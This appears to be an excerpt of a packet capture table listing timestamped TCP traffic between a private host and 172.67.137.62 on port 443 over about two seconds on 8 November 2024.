                                                                                                                          Nov 8, 2024 10:58:44.916331053 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:44.916601896 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.916791916 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.916800976 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:44.916812897 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.916933060 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.917054892 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.917064905 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:44.917068958 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:44.917300940 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.917483091 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.917658091 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.917658091 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.917871952 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.918004036 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.918093920 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.918097973 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:44.918528080 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.918528080 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.918720007 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.918720007 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.918724060 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:44.918911934 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.918911934 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.919152975 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.919152975 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.919157982 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:44.919344902 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.919537067 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.919728994 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.919778109 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.919826984 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.919955969 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.920123100 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.920363903 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.920461893 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.920654058 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.920846939 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.920846939 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:44.920954943 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.092354059 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.092365026 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.092372894 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.092386007 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.092622995 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.092700958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.092808008 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.092808008 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.092905998 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.092956066 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.093194962 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.093380928 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.093380928 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.093568087 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.093568087 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.093715906 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.093862057 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094032049 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094083071 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094091892 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.094094038 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.094096899 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.094338894 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094532967 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094752073 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094752073 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094856977 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094976902 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.094980955 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.095268965 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.095274925 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.095460892 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.095460892 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.095649958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.095841885 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.095841885 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.095963955 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.096072912 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.096191883 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.096431971 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.096625090 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.096625090 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.096817970 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.096817970 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.096914053 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.097103119 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.267402887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.267414093 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.267421007 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.267431974 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.267764091 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.267949104 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.268162966 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.268213034 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.268527031 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.268536091 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.268537998 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.268646002 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.269120932 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.269120932 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.269428015 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.269608021 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.269695997 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.270076990 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.270076990 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.270452976 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.270570040 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.270895004 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.271351099 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.271545887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.271636009 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.444791079 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.444807053 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.445250034 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.445491076 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.445491076 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.461714029 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.461725950 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.461729050 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.461743116 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.461771965 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.461963892 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.462063074 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.462126017 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.462327003 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.462327003 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.462464094 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.462610006 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.462701082 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.462860107 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.462862015 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.462863922 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.462964058 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.463154078 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.463346958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.463346958 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.463357925 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.463454962 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.463571072 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.463689089 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.463937044 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.464034081 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.464226007 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.464417934 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.464417934 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.464548111 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.464651108 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.464989901 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.465184927 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.465184927 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.465373993 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.465565920 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.465614080 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.465712070 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.465810061 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.466001987 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.637763977 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.637774944 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.637782097 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.638009071 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.638009071 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.638391972 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.638391972 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.655380964 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.655391932 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.655405998 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.655416012 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.655654907 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.655726910 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.655806065 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.655884027 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.655982018 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.656091928 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.656222105 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.656342983 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.656441927 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.656702042 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.656702042 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.656893015 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.657113075 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.657162905 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.657215118 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.657335043 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.657430887 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.657483101 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.657486916 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.657577991 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.657769918 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.657962084 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.658010960 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.658185005 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.658262968 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.658380032 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.658641100 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.658833027 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.658833027 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.659024954 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.659074068 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.659151077 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.659342051 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.659523964 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.659679890 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.842958927 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.842971087 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.842976093 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.843235970 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.843242884 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.843283892 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.843467951 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.843467951 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.843632936 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.858899117 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.858911037 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.858922005 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.858930111 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.859209061 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.859353065 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.859404087 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.859452009 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.859500885 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.859771967 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.859817982 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.859915018 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.860106945 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.860106945 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.860352993 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.860729933 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.860783100 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.860894918 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.860898018 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:45.861254930 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.861254930 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.861638069 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.861757040 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.862246990 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.862246990 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.862440109 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.862631083 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.862631083 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.862871885 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.863064051 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:45.863255978 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.043462038 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.043473959 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.043482065 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.043741941 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.043920040 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.043920040 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.044097900 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.044147015 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.061569929 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.061577082 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.061587095 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.061598063 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.061790943 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.061839104 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.061887980 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.061959028 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.062050104 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.062271118 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.062349081 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.062419891 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.062468052 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.062516928 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.062764883 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.062845945 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.062959909 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.063038111 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.063255072 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.063312054 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.063401937 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.063481092 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.063529968 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.063530922 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.063532114 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.063533068 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.063534021 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.063627005 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.063818932 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.063818932 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.064011097 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.064059019 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.064260006 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.064357042 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.064546108 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.064692974 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.064884901 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.065077066 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.065077066 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.065175056 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.065464973 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.065656900 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.065849066 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.065849066 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.066040993 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.253830910 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.253842115 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.253844976 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.254309893 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.254309893 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.254462957 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.254462957 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.267324924 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.267332077 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.267339945 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.267350912 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.267689943 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.267752886 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.267923117 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.267971992 CET49747443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:58:46.268101931 CET44349747172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:58:46.268150091 CET49747443192.168.11.30172.67.137.62
